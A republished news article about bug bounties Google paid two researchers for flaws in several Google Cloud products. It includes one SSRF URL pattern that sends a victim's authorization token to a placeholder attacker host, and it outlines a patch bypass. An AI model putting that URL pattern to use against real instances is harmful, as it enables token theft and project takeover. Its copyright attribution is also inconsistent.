Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Google pays hacker duo $22k in bug bounties for flaws in multiple cloud projects

Vulnerabilities in four Google Cloud Platform (GCP) projects have earned a pair of security researchers more than $22,000 in bug bounties.

The most lucrative project for hacker duo Sreeram KL and Sivanesh Ashok was machine learning training and deployment platform Vertex AI, which netted them a pair of $5,000 payouts for a server-side request forgery (SSRF) bug and subsequent patch bypass.

Documented in a blog post by Sreeram, the flaw resided in Vertex AI’s workbench feature, which enables the creation of Jupyter notebook-based development environments on the cloud.

By abusing the SSRF vulnerability and duping victims into clicking a malicious URL, attackers could potentially seize control of an authorization token and thereafter all of the victim’s GCP projects, as demonstrated in the video below.

SSRF bug

When the researchers found a URL that seemed to offer scope for SSRF, “requesting the original URL resulted in a response that looked like the output of an authenticated request sent to compute.googleapis.com,” said Sreeram. “From previous experience, I know these endpoints use the authorization header for credentials.”

Fuzzing surfaced a URL – https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ – that bypassed this check, said Sreeram. “Furthermore, the vulnerable endpoint was a GET request with no CSRF protection (pretty common),” said Sreeram.

As for finding attack targets, a victim’s subdomain is readily ascertained because subdomains are leaked to several third-party domains, such as github.com, “via referer in the general application flow”.

Google addressed the issue by adding cross-site request forgery (CSRF) protection to the GET endpoints and improving verification of the domain.

Patch bypass

After the fix was rolled out, however, Sreeram and Ashok noticed that changing compute.googleapis.com to something.google.com failed to trigger an error as it had previously.

Circumventing the fix therefore needed an open redirection in *.google.com, they surmised.

With JavaScript-based redirections not an option – since the server didn’t parse the language – they turned to Google web feed management service FeedBurner. The researchers found that when the user deactivates the proxy, the service will redirect URLs to their domain rather than proxying their RSS feed.

The exploit concluded with a CSRF bypass that leveraged a technique developed in 2020 by ‘@s1r1us’ targeting Jupyter Lab.

The second fix involved ending support for *.google.com as a proxy URL.

“While finding this issue, we gained insight into the workings of managed GCP products, which helped us find other bugs in GCP,” Sreeram told The Daily Swig.

Theia, Compute Engine, Workstations bugs

This included exploiting the workbench feature again in Theia, the integrated development environment (IDE) Google uses in Cloud Shell, as disclosed in a separate blog post published by Sreeram.

Advertisement. Scroll to continue reading.

Because user-managed instances used the project’s default compute engine service account, the research duo were able to compromise the entire project by exploiting a known XSS vulnerability (CVE-2021-41038) to fetch the service account token from the metadata server. This earned the pair a further $3133.70 bounty.

The first security flaw they found in GCP, as documented by Ashok, was an SSH key injection issue in Google Cloud’s Compute Engine.

Generating a $5,000 windfall with a $1,000 bounty bonus, the vulnerability resided in the SSH-in-browser function and could lead to remote code execution (RCE) in a victim’s Compute Engine instance (as demonstrated in the proof-of-concept video above).

The researchers also earned a further $3,133.70 for an authorization bypass in Cloud Workstations, which provides fully managed development environments for security-sensitive enterprises. Ashok outlined this find in a fourth blog post.

The pair earned a total of $22,267 from six separate bug bounty payouts.

The Daily Swig has invited Google to comment on these vulnerabilities but no response yet. We’ll update the article should that change.

Copyright 2021 Associated Press. All rights reserved.

Source: https://portswigger.net/daily-swig/google-pays-hacker-duo-22k-in-bug-bounties-for-flaws-in-multiple-cloud-projects

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

Google has announced the first open-source quantum resilient FIDO2 security key implementation, which uses a unique ECC/Dilithium hybrid signature schema co-created with ETH Zurich....

Cyber Security

Google has published its annual 0-day vulnerability report, presenting in-the-wild exploitation stats from 2022 and highlighting a long-standing problem in the Android platform that...

Cyber Security

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month. The framework means that well-intentioned security researchers are free...

Cyber Security

Twitter faced further criticism this week when Elon Musk’s social networking platform announced SMS-based 2FA will only be available to paying customers going forward....

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO